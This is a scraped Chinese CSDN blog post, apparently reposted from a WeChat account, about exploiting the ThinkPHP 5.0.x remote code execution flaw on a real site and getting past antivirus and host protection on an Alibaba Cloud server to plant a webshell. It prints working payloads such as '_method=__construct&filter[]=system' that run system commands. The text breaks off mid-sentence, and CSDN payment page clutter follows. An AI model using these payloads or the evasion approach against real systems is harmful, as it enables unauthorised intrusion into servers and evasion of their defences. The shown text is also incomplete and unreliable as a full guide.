thinkphp 5.0.3 rce getshell_TPRCE绕过阿里云防护Getshell

本文探讨了ThinkPHP 5.0.3远程代码执行(RCE)漏洞利用时如何绕过阿里云主机的安全防护,包括360安全卫士、服务器安全狗和Windows Defender的限制。作者分享了利用certutil进行Webshell编码上传的方法,以避免被安全软件拦截,并建议在测试环境中进行进一步的实验。
摘要由CSDN通过智能技术生成
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

0x01 前言

这篇文章记录的是笔者在阅读某公众号发布的“ 记一次对****某校区失败的渗透测试 ”文章时发现存在漏点,找到目标站点并对原文章作者在Getshell时遇到的问题进行了一些测试,Getshell失败的原因他认为是Assert、Eval被禁用或者360安全防护问题,其实都不是。
漏点处出在Burpsuite请求/响应包中以及****等关键字。

66b0b1bc492ab48441a68b45945f4837.png

0x02 TP-RCE漏洞利用与杀软对比

这是一个后台登录页,基于ThinkPHP V5.0.20框架,可利用ThinkPHP 5.0.0~5.0.23 RCE漏洞直接执行系统命令,不同小版本之间利用的Payload可能会有些差别。
_method=__construct&filter=system&a=whoamihttp://192.168.1.7/ThinkPHP/public/index.php?s=captchapost_poc1:_method=__construct&filter[]=system&method=get&get[]=whoamipost_poc2:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

0cbed2b46e428024d41bfa8a28ce70d6.png

通过与tasklist /sv

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值